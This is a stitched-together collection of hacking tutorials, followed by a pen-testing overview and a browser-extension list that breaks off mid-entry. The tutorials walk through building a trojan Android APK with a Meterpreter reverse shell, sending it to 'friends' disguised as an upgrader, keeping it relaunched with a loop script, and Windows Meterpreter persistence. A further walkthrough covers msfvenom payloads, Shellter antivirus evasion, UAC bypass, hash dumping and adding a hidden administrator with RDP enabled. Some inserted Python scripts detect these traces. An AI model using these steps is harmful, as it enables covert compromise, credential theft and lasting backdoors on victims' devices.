Hack Android Using Kali (Remotely)
Hello Hackers! Welcome to my 2nd Post:
This is a tutorial explaining how to hack Android phones with Kali.
I can't see any tutorials explaining this hack/exploit, so I made one.
(Still, you may already know about this.)
Step 1: Fire Up Kali
- Open a terminal and make a Trojan .apk.
- You can do this by typing:
  msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk
  (replace LHOST with your own IP)
- You can also hack Android over the WAN, i.e. through the Internet, by using your public/external IP as the LHOST and by port forwarding (ask me about port forwarding in the comment section if you have problems).

Step 2: Open Another Terminal
- Open another terminal while the file is being produced.
- Load the Metasploit console by typing: msfconsole
Step 3: Set Up a Listener
- After it loads (it will take time), load the multi/handler exploit by typing: use exploit/multi/handler
- Set up a (reverse) payload by typing: set payload android/meterpreter/reverse_tcp
- To set the LHOST, type: set LHOST 192.168.0.4 (even if you are hacking over the WAN, type your private/internal IP here, not the public/external one)

Step 4: Exploit!
- At last, type: exploit to start the listener.
- Copy the application that you made (Upgrader.apk) from the root folder to your Android phone.
- Then send it by uploading it to Dropbox or any file-sharing website (like www.speedyshare.com).
- Then send the link that the website gave you to your friends and exploit their phones (only on the LAN, but if you used the WAN method then you can use the exploit anywhere on the Internet).
- Let the victim install the Upgrader app (he would think it is meant to upgrade some features on his phone).
- However, the option to allow installation of apps from Unknown Sources must be enabled (if it is not already) in the security settings of the Android phone for the Trojan to install.
- And when he clicks Open...
Step 5: BOOM!
There comes the meterpreter prompt:

------------------------------------------HACKED-------------------------------------------------

The END:
Keep coming for more!
Some post modules that work for Windows might not work on Android, e.g. run killav, persistence (persistent backdoor), etc.
Thank You!
F.E.A.R.

Create a Persistent Back Door in Android Using Kali Linux:
In this tutorial I am going to show you how to make the backdoor we created in my guide here a persistent one.
I finally found out a way to do this; as I was/am very poor in bash scripting, I took much time (20 hrs approx.) to get the script working and executable, thanks to the raw syntaxes I found on other sites.

Step 1: Fire Up Kali and Hack an Android System
Use this guide to hack an Android system on the LAN.
I'll be hacking over the WAN, using a VM.

- Let's create a backdoor by typing:
  msfpayload android/meterpreter/reverse_tcp LHOST=182.68.42.6 R > /root/abcde.apk
- Now, let's set up a listener:
  msfconsole
  use exploit/multi/handler
  set payload android/meterpreter/reverse_tcp
  set LHOST 192.168.0.4
  exploit
After the user/victim installs and opens abcde.apk, Meterpreter comes up...

Step 2: Create a Persistent Script
Copy these commands into a text editor to create a script, and save it as anything.sh (the .sh file extension is important!):
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while true
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
(Don't copy the "-----" lines. The am start command is a single line; there is no line break before com.metasploit.stage.)
(The first line, #!/bin/bash, is also important: it marks the script as a bash shell script.)
(You can set the sleep to however many seconds you want the script to sleep between restarts.)
Move/copy this to the home/root folder of Kali.
--------------------------------------------------------------------------------------------------------
Updated Script v3 (compatible with any Android version)
CRITICAL: DO NOT COPY/PASTE THE SCRIPT DIRECTLY, OR IT (may) WON'T WORK /!\
..I guess you will have to write it on your own.. (Don't ask me why..)
Code:
--------------------------------------------------------------------------------------------------------
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done
--------------------------------------------------------------------------------------------------------
There is a space between 'while' and ':'.
No multiple spaces in the script.
No line break inside the am start line (so a total of 5 lines).
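From the defender's side, the loop above leaves a very regular trace: the same activity is started from the shell user (uid 2000) every 20 seconds, which shows up in logcat as ActivityManager START lines. The following Python script is an added example, not part of the original post, that parses such lines and flags any component relaunched at a near-constant interval. The log lines are constructed for this example, and their exact field layout is an assumption rather than output captured from a device.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample logcat lines in ActivityManager "START" form (the exact
# field layout is an assumption, not output captured from a device). The
# com.metasploit.stage component is relaunched every 20 s from uid 2000 (the
# "shell" user), which is what the loop script on the page produces.
SAMPLE_LOGCAT = """\
06-01 10:00:00.120 I/ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.android.chrome/.Main} from uid 10050
06-01 10:00:05.000 I/ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity} from uid 2000
06-01 10:00:25.010 I/ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity} from uid 2000
06-01 10:00:45.030 I/ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity} from uid 2000
06-01 10:01:05.020 I/ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.metasploit.stage/.MainActivity} from uid 2000
06-01 10:01:10.500 I/ActivityManager: START u0 {act=android.intent.action.MAIN cmp=com.android.settings/.Settings} from uid 10020
"""

START_RE = re.compile(
    r"^(?P<ts>\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d{3}) I/ActivityManager: START u\d+ "
    r"\{.*?cmp=(?P<cmp>[\w.]+/[\w.$]+).*?\} from uid (?P<uid>\d+)$"
)


def parse_starts(text):
    """Return (timestamp_seconds, component, uid) for each ActivityManager START line."""
    events = []
    for line in text.splitlines():
        m = START_RE.match(line)
        if not m:
            continue
        # logcat omits the year; prepend a fixed one so strptime can parse the stamp
        ts = datetime.strptime("2024-" + m.group("ts"), "%Y-%m-%d %H:%M:%S.%f")
        events.append((ts.timestamp(), m.group("cmp"), int(m.group("uid"))))
    return events


def find_periodic_relaunches(events, min_starts=3, max_jitter=2.0):
    """Flag components started at least min_starts times from the same uid with
    near-constant spacing (every gap within max_jitter seconds of the median gap).
    Returns {(component, uid): median_gap_seconds}."""
    by_key = defaultdict(list)
    for ts, cmp, uid in events:
        by_key[(cmp, uid)].append(ts)
    flagged = {}
    for key, times in by_key.items():
        if len(times) < min_starts:
            continue
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        median = sorted(gaps)[len(gaps) // 2]
        if all(abs(g - median) <= max_jitter for g in gaps):
            flagged[key] = round(median, 1)
    return flagged


if __name__ == "__main__":
    for (cmp, uid), gap in find_periodic_relaunches(parse_starts(SAMPLE_LOGCAT)).items():
        print(f"{cmp} relaunched by uid {uid} every ~{gap}s")
```

Run against the constructed sample, only com.metasploit.stage/.MainActivity is reported (relaunched by uid 2000 every ~20 s); the one-off Chrome and Settings starts are ignored. Uid 2000 is a useful extra filter in practice, since normal app launches come from the launcher or the app's own uid rather than from an interactive shell.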
Step 3: Upload It to the Hacked Android System
You need to upload the shell script to /etc/init.d/ so that it is persistent even after a reboot!
To do this, navigate to the directory using the following commands:
  cd /
Now you should be in the root directory; you can check by typing:
  ls
Now type:
  cd etc
Check again by typing:
  ls
Again change directory:
  cd init.d
  ls
Here we are...

Time to upload the shell script. Do this by typing:
  upload anything.sh

What the? No! We need root access to complete this command! Darn!
Never mind:
> Let's just make the application (i.e. the Main Activity) persistent until reboot.
> However, it will not be persistent after the victim's Android system reboots.
> To do this, upload the script anywhere on the sdcard:
  cd /
  cd /sdcard/Download
  ls
  upload anything.sh

Done! Uploaded!

Step 4: Execute the Script
Now all we have to do is execute the script once, and then everything will be done by the script automatically.
Drop into the system's shell by typing:
  shell
Now navigate to the location of the script:
  cd /
  cd /sdcard/Download
  ls
Now it's time for EXECUTION. Type:
  sh anything.sh

The script has been activated! All you have to do is press Ctrl+C to terminate the shell (don't worry, the script is still running).
Reboot to eliminate the script, or use a task killer.
Step 5: Testing...
You can test it by exiting from meterpreter and setting up a listener again.
You should get a meterpreter prompt automatically!
PROOF:
Wow! It happened so fast that 3 sessions got opened one after another.
(I know that the above picture shows that I am hacking on the LAN instead of the WAN; my public IP is dynamic and my router had some technical problems, so it kept rebooting itself, so I showed it on the LAN. BUT no worries, I have tested it on the WAN, works fine.)
The END:
Yes! Finally a persistent backdoor has been created successfully for Android systems.

Things to Remember:
- The persistence of the backdoor will only remain until a reboot of the Android system.
- If you are hacking over the WAN and you have a dynamic public IP, then the persistence will only remain until your router reboots/your IP changes.
- Remember to reboot the Android device to eliminate the running script if you are testing on your own Android system.
- If the victim's Android system is rooted and your public IP is static, then:
  1) The persistence will remain forever on the WAN!
  2) The persistence will remain forever on the LAN, obviously.

Good-Bye Hackers!
Keep Coming For More!
I'll be waiting for Your Likes and Comments,

Thank You,
F.E.A.R.
How to Remotely Install an Auto-Reconnecting Persistent Back Door on Someone's PC
Most of my recent posts have addressed using Metasploit's Meterpreter and what we can
do once we have embedded it on the victim's system. This includes remotely installing a
keylogger, enabling the webcam, enabling the microphone and recording, disabling the
antivirus software, among many other things. The list is almost unlimited.
Unfortunately, the Meterpreter ceases to work if the victim system is rebooted. As a result,
many of you have written me asking whether we can maintain or persist the Meterpreter
on the victim system.

The answer is an unequivocal "Yes!"

We can embed the Meterpreter and then come back later—even after the victim's
computer has been rebooted—and reconnect to our little backdoor or listener. I'm
dedicating this post to showing you how to do this.

Getting Started
Let's assume that you have been successful in embedding the Meterpreter on the victim's
system, and that you have a screen that looks like the screenshot below. If you're not sure
how to do this, check out some of my previous posts for help.
Now, let's get started.

Step 1: Run the Persistence Script

Metasploit has a script named persistence that can enable us to set up a persistent Meterpreter (listener) on the victim's system. First let's take a look at the options that are available when we run this script by using the -h switch.
At the Meterpreter prompt, type the following:
meterpreter > run persistence -h

We can see in the screenshot above that...

- The -A switch starts a matching handler to connect to the agent.
- With the -L switch we tell the system where to place the Meterpreter on the target system.
- The -P switch tells the system what payload to use (windows/meterpreter/reverse_tcp is the default, so we won't use this switch).
- -S starts the agent on boot with system privileges.
- The -U switch starts the agent when the user (U) logs on.
- The -X switch starts the agent when the system boots.
- With the -i switch we can indicate the time interval between each connection attempt.
- The -p switch indicates the port, and finally...
- The -r switch indicates the IP address of our (r) system running Metasploit.
Here we will use the -A, -L, -X, -i, -p, and -r switches.
Type at the Meterpreter prompt:
meterpreter > run persistence -A -L c:\\ -X -i 30 -p 443 -r 192.168.1.113
This command will run the persistence script, which starts a matching handler (-A), places the Meterpreter at c:\\ on the target system (-L c:\\), starts the listener when the system boots (-X), checks every 30 seconds for a connection (-i 30), connects on port 443 (-p 443), and connects to our local system at IP address 192.168.1.113 (-r 192.168.1.113).
When we run this command, this is what we should see.
When we run this command, this is what we should see.

Step 2: Opening a Second Session

We can see that we have opened a Meterpreter session on the victim system.

We return to our Metasploit prompt by typing:

meterpreter > background

This will return us to the msf prompt, where we can now list the sessions:
msf exploit(ms08_067_netapi) > sessions -l
We see above that we now have two or more sessions running on the victim system (I actually have three sessions running on this victim), as the persistent Meterpreter has opened a second session on the system.

Step 3: Testing
This is all very nice, but the key here is whether the Meterpreter will reconnect to our system even after the target system reboots. We can test this by typing:

meterpreter > reboot

This will reboot the target/victim machine and, if we are successful, the Meterpreter will reconnect to our system.

Even after the system reboots, the Meterpreter on the victim system attempts to connect to us every 30 seconds until it has successfully opened a session for us.

Now we have successfully opened a persistent connection on the victim system that we can come back to time and time again to wreak havoc!
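The reconnect behaviour just described (an attempt every 30 seconds to the handler's address and port, continuing while nothing is listening) is exactly what a network defender can hunt for. The Python below is an added example, not code from the article or from Metasploit: it reads connection records in a simplified Zeek conn.log-style layout (an assumption made for this example; the records themselves are constructed) and reports hosts that repeatedly fail to reach the same destination port, together with the mean retry gap and whether a later successful connection followed.

```python
from collections import defaultdict

# Constructed outbound connection records in a simplified Zeek conn.log layout
# (ts, id.orig_h, id.resp_h, id.resp_p, conn_state). The layout and all values
# are assumptions for this example, not captured traffic. 192.168.1.50 retries
# 192.168.1.113:443 every 30 s while no handler is listening (S0 = no reply)
# and finally gets a full session (SF) once the handler comes up.
SAMPLE_CONN_LOG = """\
1717236000.000\t192.168.1.50\t192.168.1.113\t443\tS0
1717236003.100\t192.168.1.51\t203.0.113.10\t443\tSF
1717236030.010\t192.168.1.50\t192.168.1.113\t443\tS0
1717236060.020\t192.168.1.50\t192.168.1.113\t443\tS0
1717236090.000\t192.168.1.50\t192.168.1.113\t443\tS0
1717236120.040\t192.168.1.50\t192.168.1.113\t443\tSF
1717236125.000\t192.168.1.51\t203.0.113.10\t80\tS0
"""

# Zeek conn_state values that mean the originator got no usable answer
FAILED_STATES = {"S0", "REJ", "RSTO", "RSTR"}


def parse_conn_log(text):
    """Parse tab-separated records into (ts, orig_h, resp_h, resp_p, conn_state)."""
    rows = []
    for line in text.splitlines():
        ts, orig, resp, port, state = line.split("\t")
        rows.append((float(ts), orig, resp, int(port), state))
    return rows


def find_reconnect_loops(rows, min_failed=3, window=600):
    """Return {(orig, resp, port): (failed_attempts, mean_gap_seconds, reconnected)}
    for flows where one host retries the same dst:port at least min_failed times
    without an answer inside `window` seconds. `reconnected` is True when a
    successful (SF) connection to that dst:port followed the failed run."""
    by_flow = defaultdict(list)
    for ts, orig, resp, port, state in rows:
        by_flow[(orig, resp, port)].append((ts, state))
    alerts = {}
    for key, recs in by_flow.items():
        recs.sort()
        failed = [ts for ts, st in recs if st in FAILED_STATES]
        if len(failed) < min_failed or failed[-1] - failed[0] > window:
            continue
        gaps = [b - a for a, b in zip(failed, failed[1:])]
        mean_gap = sum(gaps) / len(gaps)
        reconnected = any(st == "SF" and ts > failed[-1] for ts, st in recs)
        alerts[key] = (len(failed), round(mean_gap), reconnected)
    return alerts


if __name__ == "__main__":
    for (orig, resp, port), (n, gap, ok) in find_reconnect_loops(parse_conn_log(SAMPLE_CONN_LOG)).items():
        status = "then connected" if ok else "still failing"
        print(f"{orig} -> {resp}:{port}: {n} unanswered attempts, ~{gap}s apart, {status}")
```

On the constructed data, the only hit is 192.168.1.50 -> 192.168.1.113:443 with four unanswered attempts about 30 s apart followed by a successful session, which is the signature of an agent whose handler was briefly offline. The single failed attempt to 203.0.113.10:80 stays below the threshold, so ordinary transient failures do not alert.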

How to Attack Windows 10 Machine with Metasploit on Kali Linux
July 30, 2018 by Lester Obbayi
Introduction
The Metasploit Framework is the most commonly used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we'll look at how this framework within Kali Linux can be used to attack a Windows 10 machine. We shall do this through a malicious executable file using Shellter.

This article assumes that the installation of Kali Linux has been done and that it is reachable through a bridged connection from a Windows machine on VirtualBox.

Creating a Malicious .exe File
To create the executable, you would use msfvenom as shown in the command below:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=192.168.100.4 LPORT=4444 -o /root/something32.exe

The command above instructs msfvenom to generate a 32-bit Windows executable file that implements a reverse TCP connection for the payload. The format must be specified as .exe, and the local host (LHOST) and local port (LPORT) have to be defined. In our case, the LHOST is the IP address of our attacking Kali Linux machine, and the LPORT is the port to listen on for a connection from the target once it has been compromised.

To obtain our IP address we use the ifconfig command within Kali, specifying the interface as eth0 (since we are on Ethernet) as shown below.
The screenshot below shows the output of the command on successful .exe generation.

Antivirus solutions work by detecting malicious signatures within executables. Our file will thus be flagged as malicious once within the Windows environment. We therefore have to figure out a way to modify it to bypass antivirus detection. We will encode it to make it fully undetectable, or FUD.

Making the Executable FUD (Fully Undetectable)
To encode our executable, we shall be using Shellter. Shellter works by changing
the executable’s signatures from the obviously malicious one to a completely new
and unique one that can bypass detection.

Note that antiviruses also check the behavior of executables and employ techniques
such as heuristics scanning, so they are not just limited to checking for signatures.
During our lab tests we discovered that Windows Defender, which ships by default
with Windows 10, flagged the executable 6 out of the 10 times we used Shellter to
perform the encoding. This is despite Windows 10 being a fresh download with
latest patches applied! You will be better off purchasing Shellter Pro (or any Pro
Crypter) or writing your own Crypter to avoid antivirus flagging your executables.

Also note that when writing your own, disable automatic submissions. Otherwise
whatever you write, if detected as potentially-unwanted software, will be uploaded
by your antivirus for analysis … And we both know how that will end.

Let’s look at how to install and run Shellter.


On your Kali Linux, download Shellter with the command below:

sudo apt-get install shellter

To launch Shellter just type shellter on the terminal.

You will be required to enter the absolute path to the executable to make FUD.
Make sure to select “Auto” mode as shown below.

Shellter will then initialize and run some checks. It will then prompt you whether to
run in stealth mode. Select “Y” for yes.

The next prompt will require you to enter the payload, either a custom or a listed
one. You should select a listed one by typing “L”, unless you want to proceed with
your own custom payload. Select the index position of the payload to use. We need
a Meterpreter_Reverse_TCP, so we will have to go with “1.”
Enter LHOST and LPORT and press Enter. Shellter will run to completion and
request you to press Enter.

At this point, the executable you provided will have been made undetectable to
antivirus solutions.
Again, note that you are better off writing your own or purchasing a Crypter that is
constantly being revised. Otherwise, most of your encoding will be flagged as
malicious or potentially unwanted software.

We now need to set up a listener on the port we determined within the executable.
We do this by launching Metasploit using the command msfconsole on the Kali
Linux terminal.

The screenshot below shows what commands to issue within Metasploit. First, we'll tell Metasploit to use the generic payload handler "multi/handler" using the command use multi/handler. We will then set the payload to match the one set within the executable using the command set payload windows/meterpreter/reverse_tcp. We will then set the LHOST and LPORT this way: set LHOST 192.168.100.4 and set LPORT 4444. Once done, type "run" or "exploit" and press Enter.

The screenshot below displays the output. The reverse TCP handler should begin
waiting for a connection.

The next step is to execute it from a Windows perspective. In a real-world practical situation, this will require social engineering skills. Nevertheless, copy something32.exe to a Windows system within the same network as the Kali system.

Executing the Payload

On copying the file to our target Windows machine, we have the screenshot below. Execute the file.
The executable causes the payload to be executed and connect back to the attacking machine (Kali Linux). Immediately, we receive a Meterpreter session on our Kali Linux. This is demonstrated by the meterpreter > prompt as shown below:

Since the file was not run as “administrator,” there are Meterpreter commands that
can’t be run as they would result in an “access denied” response. This can be
confirmed by running the getuid command, which tells us that we are running as
user l3s7r0z.

To prove that the user lacks enough privileges, we attempted to run the
command mimikatz_command -f sekurlsa::logonPasswords.

The result is an “Access is denied” message as shown below:


In order to gain sufficient rights, we need to perform a UAC bypass. Next we see
how this can be done.

Privilege Escalation
Privilege escalation allows us to elevate privileges from our less privileged user
(l3s7r0z) to a more privileged one, preferably the SYSTEM user, which has all
administrative rights.

Metasploit by default provides us with some methods that allow us to elevate our
privileges. On the Meterpreter prompt we use the getsystem command, as shown
below:

Since the methods used by getsystem all fail, we need an alternative method of elevating privileges. We will use the comhijack exploit module, which is used to bypass User Account Control. To do so, we "background" our Meterpreter session, switch our exploit from multi/handler to windows/local/bypassuac_comhijack and point it at the backgrounded session using set SESSION 2.

This is shown below:

We then set the payload using set payload windows/x64/meterpreter/reverse_tcp and set the LPORT and LHOST. We then run the exploit.
We successfully receive a Meterpreter session. Typing sysinfo shows us the information of our target. getuid shows that we are running as user l3s7r0z on Windows 10, but we can elevate to SYSTEM by issuing getsystem. We can see that elevation was successful, and we can confirm this by issuing getuid again: we are now NT AUTHORITY\SYSTEM.

With these privileges, we can do quite a lot on our compromised target. For
instance, we can obtain LM and NTLM password hashes using
the hashdump command as shown above. Note that the format of the hashes above
is USERNAME:SID:LM_HASH:NTLM_HASH:::. We can even obtain
credentials from browsers, key managers, the domain controller, perform
keylogging, capture screenshots and even stream from the webcam (this will not
work on VM, it will need an actual native Windows install target).
Now that we are within the target machine, why not perform some persistence to
remain within?

Persistence
Persistence allows us to gain access back to the machine whenever we need to even
when the target decides to patch the vulnerability.

There are many ways of performing persistence. For example, we can code a
malicious virus to always connect back to us whenever the target turns on their
machine (this is called a backdoor), or even have our own user accounts within the
compromised target machine. Metasploit also provides its method of persistence,
discussed here.

Today, we’ll go with the second option, to have our own account within the target
and enable RDP so that whenever we want, we can log into the machine and access
the information we want.

Remember the NTLM hashes we were able to obtain above using the hashdump command from the mimikatz module? We can even log into any account within the target machine using any password hashes, impersonate legitimate users and download, alter or upload files.

On the Meterpreter session, we type the command shell to drop into a Windows shell on the Windows 10 target.
At the C:\WINDOWS\system32> prompt, we issue the net users command. This lists all the users within the Windows machine. As we can see, there are only two users, the Administrator and the l3s7r0z user.

We add a new user Jaime and give him the password Bru73f0rc3_

The command used to do that is:

net user /add jaime Bru73f0rc3_

We then add Jaime to the administrators group so that the account can perform
admin functions. The command used is:

net localgroup administrators jaime /add

We then add him to the RDP group. This will allow us to log in through RDP to the
target machine, even after it has been patched to have firewall and antivirus on.

The command used is:

net localgroup "Remote Desktop Users" jaime /add

After all the setup is done for user Jaime, we can use the following command to see
the user’s properties:

net user jaime

The screenshot below shows the output of the command.
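For a blue team, the sequence above (a local account is created, then added to Administrators and Remote Desktop Users within seconds) is a high-signal correlation in the Windows Security log: event 4720 is "A user account was created" and 4732 is "A member was added to a security-enabled local group". The Python below is an added example, not part of the article, that correlates the two; its tab-separated event layout and the sample events are constructed for the example and are not the real event XML field names.

```python
from collections import defaultdict

# Constructed Windows Security events in a simplified tab-separated layout:
# ts (epoch seconds), EventID, subject (who acted), target account, group.
# This layout is an assumption for the example; in the real log, 4720 is
# "A user account was created" and 4732 is "A member was added to a
# security-enabled local group", with differently named XML fields.
SAMPLE_EVENTS = """\
1717236000\t4720\tl3s7r0z\tjaime\t-
1717236005\t4732\tl3s7r0z\tjaime\tAdministrators
1717236011\t4732\tl3s7r0z\tjaime\tRemote Desktop Users
1717236100\t4732\tAdministrator\tbackupsvc\tBackup Operators
1717240000\t4720\tAdministrator\tcontractor\t-
1717260000\t4732\tAdministrator\tcontractor\tRemote Desktop Users
"""

# Local groups whose membership grants admin rights or remote interactive logon
SENSITIVE_GROUPS = {"Administrators", "Remote Desktop Users"}


def parse_events(text):
    """Parse the constructed tab-separated layout into a list of dicts."""
    events = []
    for line in text.splitlines():
        ts, eid, subject, target, group = line.split("\t")
        events.append({"ts": int(ts), "id": int(eid), "subject": subject,
                       "target": target, "group": group})
    return events


def find_new_privileged_accounts(events, window=900):
    """Correlate 4720 (account created) with later 4732 (added to a local group)
    for the same account within `window` seconds. Returns
    {account: {"created_by": subject, "groups": [group, ...]}} for accounts
    that were placed in a sensitive group shortly after being created."""
    created = {}
    for e in sorted(events, key=lambda e: e["ts"]):
        if e["id"] == 4720:
            created[e["target"]] = (e["ts"], e["subject"])
    hits = defaultdict(lambda: {"created_by": None, "groups": []})
    for e in events:
        if e["id"] != 4732 or e["group"] not in SENSITIVE_GROUPS:
            continue
        if e["target"] not in created:
            continue
        c_ts, c_subject = created[e["target"]]
        if 0 <= e["ts"] - c_ts <= window:
            hits[e["target"]]["created_by"] = c_subject
            hits[e["target"]]["groups"].append(e["group"])
    return dict(hits)


if __name__ == "__main__":
    for account, info in find_new_privileged_accounts(parse_events(SAMPLE_EVENTS)).items():
        print(f"{account} created by {info['created_by']} and added to {', '.join(info['groups'])}")
```

On the constructed events only jaime is reported: created by l3s7r0z and added to both sensitive groups within eleven seconds. The contractor account is also added to Remote Desktop Users, but hours after creation, so it falls outside the correlation window; backupsvc has no creation event at all. The 900-second window is a tuning knob; a much shorter one would still catch the scripted sequence on the page.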


In some cases RDP is not enabled at the target machine. As long as we are within
the shell, we can enable it by adding a registry key.

To enable RDP, use the following command:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

If you would like to disable RDP for whatever purpose, you can do so by typing the following command:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

The result of the operation is shown below:


From the Kali Linux machine, we can use the remmina remote connection client. If
it is not installed within Kali, you can install it by typing the following command:

apt-get install remmina

Start remmina by typing remmina on the command prompt. And connect to the
target using its IP address.

You will be required to accept a certificate. Do so and use the username and
password used to register the Jaime account. That is:

Username: jaime

Password: Bru73f0rc3_

By default, in Windows 10, the logged-in user will be asked to allow you to connect. However, if they do not respond within 30 seconds, they are automatically logged out.
Conclusion
In this article we have seen how the Metasploit Framework can be used to
compromise a Windows 10 machine to gain a Meterpreter session. We have used
Shellter to FUD our malicious executable to bypass the Windows 10 antivirus and
performed privilege escalation to gain more rights on our compromised machine.

Hackers are not limited in what they can use the framework for. For instance, it can
also be used to perform information gathering and pivoting through compromised
networks.

17 Best Security Penetration Testing Tools The Pros Use
Are you seeking the best penetration testing tool for your needs? We have you covered.

Penetration testing tools are software applications used to check for network security
threats.

Each application on this list provides unique benefits. Easy comparison helps you
determine whether the software is the right choice for your business. Let’s dive in and
discover the latest security software options on the market.
What Is Penetration Testing?
Penetration testing, also known as pen testing, is a method computer security experts use to detect and take advantage of security vulnerabilities in a computer application. These experts, who are also known as white-hat hackers or ethical hackers, do this by simulating real-world attacks by criminal hackers, known as black-hat hackers.

In effect, conducting penetration testing is similar to hiring security consultants to attempt a security attack on a secure facility to find out how real criminals might do it. The results are used by organizations to make their applications more secure.

How Penetration Tests Work

First, penetration testers must learn about the computer systems they will be attempting to breach. Then, they typically use a set of software tools to find vulnerabilities. Penetration testing may also involve social engineering threats: testers will try to gain access to a system by tricking a member of an organization into providing access.
Penetration testers provide the results of their tests to the organization, which is then responsible for implementing changes that either resolve or mitigate the vulnerabilities.

Types of Penetration Tests

Penetration testing can consist of one or more of the following types of tests:

White Box Tests
A white box test is one in which organizations provide the penetration testers with a variety of security information relating to their systems, to help them better find vulnerabilities.

Blind Tests
In a blind test, also known as a black-box test, organizations provide penetration testers with no security information about the system being penetrated. The goal is to expose vulnerabilities that would not be detected otherwise.

Double-Blind Tests
A double-blind test, also known as a covert test, is one in which organizations not only withhold security information from the penetration testers but also do not inform their own computer security teams of the tests. Such tests are typically highly controlled by those managing them.

External Tests
An external test is one in which penetration testers attempt to find vulnerabilities
remotely. Because of the nature of these types of tests, they are performed on
external-facing applications such as websites.

Internal Tests
An internal test is one in which the penetration testing takes place within an
organization’s premises. These tests typically focus on security vulnerabilities that
someone working from within an organization could take advantage of.

Top 10 Browser Extensions for Ethical Hackers
1 year ago
by Usama Azad
Ethical hacking is not just a single skill; it is a whole set of skills, and among these skills is the use of different tools for different techniques, to work faster and with less effort.
Today we will discuss the browser extensions that every ethical hacker should use to make their life and hacking a lot easier than before; we will talk about the best among them and the purpose of each. Some of these extensions are Chrome-only, others are Firefox-only, and some are available for both.

Now let’s start with those browser extensions:

Tamper Data
Tamper Data allows you to monitor and modify http, https and other web browser
requests and responses which are not generally shown to you. If you have ever used
burp suite, you will get a better understanding that tamper data is like a smaller
version of burp suite within browser. Most of the ethical hacking is based upon
fuzzing and for that we often need to change or modify inputs and requests and we
can use this browser extension for this purpose. Tamper Data is for both Chrome and
Firefox. Similar extensions include ‘Request Maker’, ‘EditThisCookie’ and ‘Live
HTTP Headers’.

Link (Firefox): https://addons.mozilla.org/en-US/firefox/addon/tamper-data-for-ff-quantum/
Link (Chrome): https://chrome.google.com/webstore/detail/tamper-chrome-extension/hifhgpdkfodlpnlmlnmhchnkepplebkb?hl=en
Wappalyzer
In web application penetration testing, we need to gather information about its
domain, hardware and software such as what OS is running on server and of what
version? This process is known as information gathering or banner grabbing. This
process is helpful to take advantage of Common Vulnerabilities and Exposures
(CVE). Wappalyzer is the browser extension for this purpose, i.e., it extracts out
important information about the web application that can be useful in pentesting it.
Wappalyzer extension is available for both Chrome and Firefox. Similar extensions
for this kind of information gathering are ‘Firebug’ and ‘IP Address and Domain
Info’.

Link (Firefox): https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
Link (Chrome): https://chrome.google.com/webstore/detail/wappalyzer/gppongmhjkpfnbhagpmjfkannfbllamg?hl=en
Proxy SwitchySharp
No one better than ethical hackers can appreciate the importance of a reliable proxy
and Proxy SwitchySharp extension not only provides that proxy but it also provides
additional features that help a lot in ethical hacking as well as for other technical
users. Proxy SwitchySharp has a feature of tab switching proxies which changes its
proxy configurations based upon the URL requested, which means you can use
multiple different proxies for multiple different websites at the same time without the
hassle of handling it manually. Proxy SwitchySharp is for Chrome only. Among
proxy extensions, ‘FoxyProxy’ has also earned its name as a proxy manager.

Link (Chrome): https://chrome.google.com/webstore/detail/proxy-switchysharp/dpplabbmogkhghncfbfdeeokoefdjegm?hl=en
HackBar
HackBar provides an ease of access and interface to web pentesting. It can be used for
ease in SQL injection, XSS and other attacks as it gives user-friendly space for
fuzzing inputs and URLs. Along with an interface, it also helps in SQL functions,
XSS queries, encoding, decoding, hash generation, etc. Furthermore, it helps in easily
reading, copying and requesting URLs so that you can easily pentest or test any web
application. This extension is for both Chrome as well as for Firefox.

Link (Firefox): https://addons.mozilla.org/en-US/firefox/addon/hackbartool/
Link (Chrome): https://chrome.google.com/webstore/detail/hackbar/ejljggkpbkchhfcplgpaegmbfhenekdc?hl=en
Open Port Check Tool
As its name suggests, Open Port Check Tool detects any open ports on the current
computer to alert the user to turn off any unused port and minimize any attacking
possibility. This is quite helpful in pentesting as unused open ports are not
recommended and are considered to be an invite for an attacker to exploit any
vulnerability on that port. It is an extension for Chrome users only.

Link (Chrome): https://chrome.google.com/webstore/detail/open-port-check-tool/lefghalnfhaklfbndadklndcndabkadb
Bishop Vulnerability Scan
This extension is a vulnerability scanner for websites. It scans the sites you target for different common vulnerabilities like misconfigured files, exposed version control systems, and parent and child directory traversal. It automatically checks for these basic vulnerabilities in the sites, running in the background. It is made for testing purposes on your own site or on a site you have authorisation to scan. HPP Finder is another web vulnerability testing browser extension, which specifically checks for HTTP Parameter Poisoning (HPP) exploits. Bishop Vulnerability Scan is a Chrome-based extension.

Link (Chrome): https://chrome.google.com/webstore/detail/bishop-vulnerability-scan/cbkdeoaaclnbidadjimofnhpbfhjakoe
OffSec Exploit-db Search
This extension does not run exploits itself; it searches Exploit-DB, the exploit
database maintained by Offensive Security. You can search for exploits for many
different platforms. The database not only provides information about each exploit but
also provides payloads and other related material for some of them, and this browser
extension searches through it. The extension is available for Firefox only.
Link(Firefox): https://addons.mozilla.org/en-US/firefox/addon/offsec-exploit-db-search/
Site Spider Mark II
It extracts all the publicly accessible links used on a site and is used to find broken
links in a website. Site Spider Mark II also shows you the whole list of links that it
finds, for reference. The Site Spider extension is for Chrome users. You can find it at:

Link(Chrome):
